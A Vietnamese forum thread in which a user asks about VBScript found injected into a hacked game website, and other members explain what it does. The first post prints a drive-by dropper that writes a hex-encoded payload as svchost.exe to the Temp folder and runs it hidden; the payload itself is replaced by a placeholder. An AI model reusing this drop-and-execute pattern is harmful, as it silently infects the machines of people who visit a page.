[ VBScript ] Virus dropFileName = "svchost.exe"

Thảo luận trong 'Virus/Malware' bắt đầu bởi yingwu, 11/08/17, 12:08 AM.

  1. yingwu

    yingwu New Member

    Tham gia: 10/08/17, 11:08 PM
    Bài viết: 3
    Đã được thích: 1
    Nghe tên tiêu đề em nghĩ chắc mấy cao thủ cũng biết con Virus này rồi nhỉ , hehe . Tại em cũng có đọc mấy bài viết trước từ con Virus này nhưng có từ những năm 2011-2013.
    Hôm qua em lướt Web thấy một trang về thể loại Game hồi trước em hay chơi . Em vào thì thấy nó ghi 'Website đang bị gián đoạn do bị tấn công' . Em có view-source thì thấy bên cuối mã nguồn thì có dòng này

    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "Trong đây là đoạn code đc mã hóa rất dài"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>

    Em cũng gà mờ trong việc lập trình , nên có thể hiểu sơ sơ đoạn Code ( có khi còn hiểu sai ) , em nghĩ nó xóa File svchost.exe trên máy của mình và tạo ra một đoạn script gì đó để khai thác và ẩn trong file svchost.exe trên máy em và các mã độc đó được đặt trong biến WriteData thì phải ... Em vào trang Web này liệu đoạn mã này có thực thi đến file svchost.exe trên máy em không mọi người , tại em vào xem svchost.exe trong system32 thì thấy dung lượng nó chỉ 27kb

    Em cũng có đọc mấy bài viết về con Virus này nhưng mà họ không có nói về tác hại của nó và cũng không nói rõ nếu Client truy cập vào trang Web có đoạn mã này thì liệu máy họ có bị dính Virus hay không.
    Em cảm ơn mọi người trước , em cũng mới vào diễn đàn và hoạt động . Hi vọng được mọi người giúp đỡ ! Nếu có gì sai xót thì xin mọi người bỏ qua ^^
     
    HustReMw thích bài này.
  2. luffy

    luffy W-------

    Tham gia: 26/02/14, 08:02 AM
    Bài viết: 154
    Đã được thích: 24
    Nó không xóa file svchost.exe đâu em. Nó chỉ tạo file có tên giống thôi, thư mục khác kìa:DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName.

    GetSpecialFolder: lấy về đường dẫn các thư mục kiểu như %temp%, %appdata%
     
    whf thích bài này.
  3. HustReMw

    HustReMw Moderator Thành viên BQT

    Tham gia: 20/12/16, 05:12 PM
    Bài viết: 77
    Đã được thích: 65
    không có quyền to tới mức xoá được svchost đâu bạn ạ
     
  4. yingwu

    yingwu New Member

    Tham gia: 10/08/17, 11:08 PM
    Bài viết: 3
    Đã được thích: 1
    Cảm ơn 2 anh đã trả lời câu hỏi của em
    FSO.GetSpecialFolder(2) hình như là trả về TemporaryFolder . Em có tìm trong Folder này ( Temp ) mà không có file svchost.exe đó . Giờ không có biết nên xóa hết trong temp không anh nhỉ ? Tại nghe nhiều người cũng nói Folder này cũng có nhiều cái quan trọng . Hi vọng được anh giúp :D
     
  5. luffy

    luffy W-------

    Tham gia: 26/02/14, 08:02 AM
    Bài viết: 154
    Đã được thích: 24
    Cái VBScript này chỉ chạy trên IE thôi nhé em, em dùng chrome hoặc firefox thì không sao.
     
  6. yingwu

    yingwu New Member

    Tham gia: 10/08/17, 11:08 PM
    Bài viết: 3
    Đã được thích: 1
    Dạ okay , cảm ơn anh ! Hèn chi giờ con Virus này cũng ít ai hỏi tới . Có mấy thằng như em mới hỏi :p
     

Chia sẻ trang này